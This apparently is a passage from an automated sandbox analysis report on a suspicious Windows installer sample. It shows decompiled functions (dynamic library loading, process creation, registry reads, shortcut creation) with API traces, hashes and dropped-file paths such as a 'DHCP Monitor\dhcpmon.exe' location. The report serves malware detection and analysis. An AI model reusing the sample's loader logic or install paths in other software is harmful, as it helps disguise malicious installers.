                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                    • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                    • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                    • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                    0x00405be6
                                                                    0x00405bfd
                                                                    0x00405c05
                                                                    0x00405c05
                                                                    0x00405c0d

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403473,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403473,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BF4
                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405BE5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-2382934351
                                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                    • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                    • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 59%
                                                                    			E0040209D(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                                    0x0040209d
                                                                    0x0040209d
                                                                    0x004020a2
                                                                    0x004020a9
                                                                    0x00402164
                                                                    0x004022dd
                                                                    0x004022dd
                                                                    0x00402a5a
                                                                    0x00402a5d
                                                                    0x00402a69
                                                                    0x00402a69
                                                                    0x004020b8
                                                                    0x004020c2
                                                                    0x004020c5
                                                                    0x004020d4
                                                                    0x004020de
                                                                    0x004020e2
                                                                    0x0040215d
                                                                    0x00000000
                                                                    0x0040215d
                                                                    0x004020e4
                                                                    0x004020ed
                                                                    0x004020f1
                                                                    0x00402135
                                                                    0x004020f3
                                                                    0x004020f6
                                                                    0x004020f9
                                                                    0x00402129
                                                                    0x004020fb
                                                                    0x004020fe
                                                                    0x00402107
                                                                    0x00402109
                                                                    0x00402109
                                                                    0x00402107
                                                                    0x004020f9
                                                                    0x0040213d
                                                                    0x00402152
                                                                    0x00402152
                                                                    0x00000000
                                                                    0x0040213d
                                                                    0x004020ce
                                                                    0x004020d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                      • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                      • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2987980305-0
                                                                    • Opcode ID: 9a7dce7029d6e90e63f6b2ec8c5914d556926361ac66931f3f99007585ef5c9d
                                                                    • Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
                                                                    • Opcode Fuzzy Hash: 9a7dce7029d6e90e63f6b2ec8c5914d556926361ac66931f3f99007585ef5c9d
                                                                    • Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                    0x00402174
                                                                    0x0040217e
                                                                    0x00402188
                                                                    0x00402195
                                                                    0x004021a0
                                                                    0x004021a3
                                                                    0x004021bd
                                                                    0x004021c3
                                                                    0x004021c9
                                                                    0x004021cc
                                                                    0x004021d6
                                                                    0x004021da
                                                                    0x004021da
                                                                    0x004021df
                                                                    0x004021f0
                                                                    0x004021f8
                                                                    0x004022d4
                                                                    0x004022d4
                                                                    0x004022db
                                                                    0x004021fe
                                                                    0x004021fe
                                                                    0x0040220d
                                                                    0x00402211
                                                                    0x00402214
                                                                    0x0040221a
                                                                    0x00402228
                                                                    0x0040222b
                                                                    0x0040222d
                                                                    0x00402238
                                                                    0x00402238
                                                                    0x0040223d
                                                                    0x0040223f
                                                                    0x00402246
                                                                    0x00402246
                                                                    0x00402249
                                                                    0x00402252
                                                                    0x00402255
                                                                    0x0040225a
                                                                    0x0040225c
                                                                    0x00402269
                                                                    0x00402269
                                                                    0x0040226c
                                                                    0x00402278
                                                                    0x0040227b
                                                                    0x00402284
                                                                    0x0040228a
                                                                    0x00402291
                                                                    0x004022aa
                                                                    0x004022ac
                                                                    0x004022ba
                                                                    0x004022ba
                                                                    0x004022aa
                                                                    0x004022bd
                                                                    0x004022c3
                                                                    0x004022c3
                                                                    0x004022c6
                                                                    0x004022cc
                                                                    0x004022d2
                                                                    0x004022e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004022d2
                                                                    0x004022dd
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp, xrefs: 00402230
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp
                                                                    • API String ID: 123533781-3107243751
                                                                    • Opcode ID: d1646d0aa5383454272ae2365f2e539284722c37dfd4dd564290cd80718c831a
                                                                    • Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
                                                                    • Opcode Fuzzy Hash: d1646d0aa5383454272ae2365f2e539284722c37dfd4dd564290cd80718c831a
                                                                    • Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}





                                                                    0x004052ec
                                                                    0x004052f6
                                                                    0x00405312
                                                                    0x00405334
                                                                    0x00405337
                                                                    0x0040533d
                                                                    0x00405347
                                                                    0x00405348
                                                                    0x0040534a
                                                                    0x00405350
                                                                    0x00405350
                                                                    0x0040535a
                                                                    0x00000000
                                                                    0x00405368
                                                                    0x0040531f
                                                                    0x00405357
                                                                    0x00405357
                                                                    0x00000000
                                                                    0x00405357
                                                                    0x0040532b
                                                                    0x0040532d
                                                                    0x00000000
                                                                    0x0040532d
                                                                    0x004052fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405303
                                                                    0x00000000

                                                                    APIs
                                                                    • IsWindowVisible.USER32 ref: 00405317
                                                                    • CallWindowProcA.USER32 ref: 00405368
                                                                      • Part of subcall function 0040431D: SendMessageA.USER32 ref: 0040432F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                    • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                    • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                    • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                    0x00406142
                                                                    0x00406144
                                                                    0x0040615c
                                                                    0x00406161
                                                                    0x00406166
                                                                    0x004061a3
                                                                    0x004061a3
                                                                    0x00406168
                                                                    0x0040617a
                                                                    0x00406185
                                                                    0x0040618b
                                                                    0x00406195
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406195
                                                                    0x004061a8

                                                                    APIs
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,0042A098,?,?,?,00000002,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,004063E9,80000002), ref: 0040617A
                                                                    • RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,0042A098), ref: 00406185
                                                                    Strings
                                                                    • Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00406137, 0040616B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                    • API String ID: 3356406503-816654878
                                                                    • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                    • Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
                                                                    • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                    • Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                    0x004058f5
                                                                    0x00405915
                                                                    0x0040591d
                                                                    0x00405922
                                                                    0x00000000
                                                                    0x00405928
                                                                    0x0040592c

                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0C0,Error launching installer), ref: 00405915
                                                                    • CloseHandle.KERNEL32(?), ref: 00405922
                                                                    Strings
                                                                    • Error launching installer, xrefs: 004058FF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                    • Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
                                                                    • Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
                                                                    • Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                    0x00405c2d
                                                                    0x00405c37
                                                                    0x00405c39
                                                                    0x00405c40
                                                                    0x00405c48
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c48
                                                                    0x00405c4a
                                                                    0x00405c4f

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(80000000,C:\Program Files (x86)\DHCP Monitor,00402F5D,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405C32
                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Program Files (x86)\DHCP Monitor,00402F5D,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405C40
                                                                    Strings
                                                                    • C:\Program Files (x86)\DHCP Monitor, xrefs: 00405C2C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
